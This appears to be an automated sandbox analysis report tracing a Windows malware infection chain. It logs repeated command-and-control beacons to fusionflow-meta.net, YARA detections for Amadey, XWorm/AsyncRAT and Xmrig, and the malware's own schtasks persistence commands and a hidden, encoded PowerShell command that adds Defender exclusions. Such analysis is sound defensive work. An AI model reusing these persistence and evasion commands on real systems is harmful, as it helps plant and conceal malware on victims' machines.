2024-08-31 20:45:39 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DYkF1BMdS9RYBGSxBSFzAiV7cORs7HTaMBCarHV%2F1acnRfwTuU2igU0OZW2NPpsvbamyNQim6nczBvgWgNdw4xcR%2BJL6cGpGXZf99YJ4HGvqwbPHBFx%2BE8R97OgTcBmL9G9AWMlj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdd8c0efd43ed-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:39 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.4	50155	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:39 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:40 UTC	684	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ExepIMmxI9FO2Y5OGm%2BvTEL5RkzQnbB0GoJBKLUntOTDcRPbRrlpX92T6S6tT4d2nz8kngyLywgpHYe36aMyC4d46hgUFzYOoMvxHifkip%2FuOwOQVkye9LraoDCyxFzHbQptOfH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdd937bb97cf3-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:40 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.4	50157	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:40 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:41 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U9KqGzws6gvYPIS0Ysm8%2BDjMzwGddNVJvhda22h0NAvQKHoFIrVyTPlzYzh6iqq5xEOyTm8YG%2FYkTBCbSIp%2B2uFctbswYZLeOhkjJ%2FRm1Yppbo1qNVcEWaB86ybXYFR3kESJXe8R"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdd9adb4442b7-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:41 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.4	50159	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:42 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:43 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xt3QHj9UynlF4U2paOdgnSAjz3eiBNhEk8gtUc9NxEHE3jweEPKUwotUM%2B6ro3n3zHGaavGIwcCh%2FwP0TtUda2njLmab38qMelE4ba0qWqZBI1TPl8PT30o%2BDDc%2F9oQaLS3H%2BdVq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdda25d5e43dd-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:43 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.4	50161	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:45:43 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:45:44 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:45:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IZRP8Qy1TrwkGNH3if9IwJUwqS0tOv2z6%2BxhosWS15xuqz94KCDlHlRAFPOUem6Z7sNI8XVq%2Bt429YnsI0AJbvf7flxXNkeLONJx3Nd4S%2B3A3XqHX%2FGcROK2%2Bm2FakOCGoqY%2BwFn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfddac790743cd-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:45:44 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:45:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	16:41:53
Start date:	31/08/2024
Path:	C:\Users\user\Desktop\trSK2fqPeB.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\trSK2fqPeB.exe"
Imagebase:	0x6e0000
File size:	551'936 bytes
MD5 hash:	4D40EBB93AA34BF94D303C07C6A7E5E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1659763375.000000001CE50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1645950276.0000000012B01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	16:41:54
Start date:	31/08/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:41:55
Start date:	31/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xe80000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:41:59
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000267001\52i.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1000267001\52i.exe"
Imagebase:	0x202e5df0000
File size:	732'672 bytes
MD5 hash:	4D190C235680B3E4481E4D7685E9A118
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1805008168.00000202F8055000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1805008168.00000202F80F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1805008168.00000202F7E25000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1762236134.00000202E7B21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1748882115.00000202804D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs Detection: 62%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:42:02
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe"
Imagebase:	0x1d0000
File size:	327'168 bytes
MD5 hash:	0EC1F7CC17B6402CD2DF150E0E5E92CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs Detection: 86%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	16:42:03
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Imagebase:	0xca0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	16:42:03
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	16:42:04
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Imagebase:	0x8c0000
File size:	327'168 bytes
MD5 hash:	0EC1F7CC17B6402CD2DF150E0E5E92CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs Detection: 86%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	16:42:04
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
Imagebase:	0x8c0000
File size:	327'168 bytes
MD5 hash:	0EC1F7CC17B6402CD2DF150E0E5E92CA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	16:42:05
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Imagebase:	0xca0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	16:42:05
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	16:42:07
Start date:	31/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUA
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	16:42:07
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Roaming\Guid\TypeId.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Guid\TypeId.exe
Imagebase:	0x1d998520000
File size:	732'672 bytes
MD5 hash:	4D190C235680B3E4481E4D7685E9A118
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000002.1976643095.000001D99A351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 0000000C.00000002.1976643095.000001D99A7E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs Detection: 62%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	16:42:08
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	16:42:08
Start date:	31/08/2024
Path:	C:\Users\user\Pictures\Illumination.pif
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Pictures\Illumination.pif"
Imagebase:	0xd10000
File size:	551'936 bytes
MD5 hash:	4D40EBB93AA34BF94D303C07C6A7E5E5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 34%, ReversingLabs Detection: 32%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	16:42:09
Start date:	31/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xdb0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000002.1797088014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	16:42:11
Start date:	31/08/2024
Path:	C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe"
Imagebase:	0xe00000
File size:	96'256 bytes
MD5 hash:	DB5717FD494495EEA3C8F7D4AB29D6B0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000011.00000002.2156164658.0000000003011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000011.00000002.2211716586.0000000013011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000011.00000002.2211716586.0000000013011000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000011.00000000.1807181029.0000000000E02000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000011.00000000.1807181029.0000000000E02000.00000002.00000001.01000000.00000010.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs Detection: 86%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	16:42:13
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe"
Imagebase:	0x160000
File size:	1'422'336 bytes
MD5 hash:	3ADFC7CF1E296C6FB703991C5233721D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 41%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	16:42:14
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe"
Imagebase:	0xea0000
File size:	1'422'336 bytes
MD5 hash:	3ADFC7CF1E296C6FB703991C5233721D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 41%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	16:42:17
Start date:	31/08/2024
Path:	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Imagebase:	0x8c0000
File size:	327'168 bytes
MD5 hash:	0EC1F7CC17B6402CD2DF150E0E5E92CA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	16:42:17
Start date:	31/08/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Imagebase:	0xca0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	16:42:17
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	16:42:17
Start date:	31/08/2024
Path:	C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
Imagebase:	0x1cd16c10000
File size:	675'840 bytes
MD5 hash:	8083FED730E151BF47528621DB8E7FF8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000017.00000002.2247277729.000001CD28F45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000017.00000002.2247277729.000001CD28CC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000017.00000002.2247277729.000001CD28CEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000017.00000002.2040138545.000001CD18870000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000017.00000002.2247277729.000001CD28EA5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000017.00000002.2051647717.000001CD18971000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs Detection: 82%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	16:42:19
Start date:	31/08/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Windows" /tr "C:\Users\user\Windows.exe"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	16:42:20
Start date:	31/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	16:42:20
Start date:	31/08/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Imagebase:	0x20d44e30000
File size:	55'824 bytes
MD5 hash:	DF5419B32657D2896514B6A1D041FE08
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000001A.00000002.4131368164.0000020D46AE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001A.00000002.4181122584.0000020D57D21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001A.00000002.4181122584.0000020D57D21000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001A.00000002.4181122584.0000020D57868000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	16:42:21
Start date:	31/08/2024
Path:	C:\Users\user\Windows.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Windows.exe
Imagebase:	0xd00000
File size:	96'256 bytes
MD5 hash:	DB5717FD494495EEA3C8F7D4AB29D6B0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
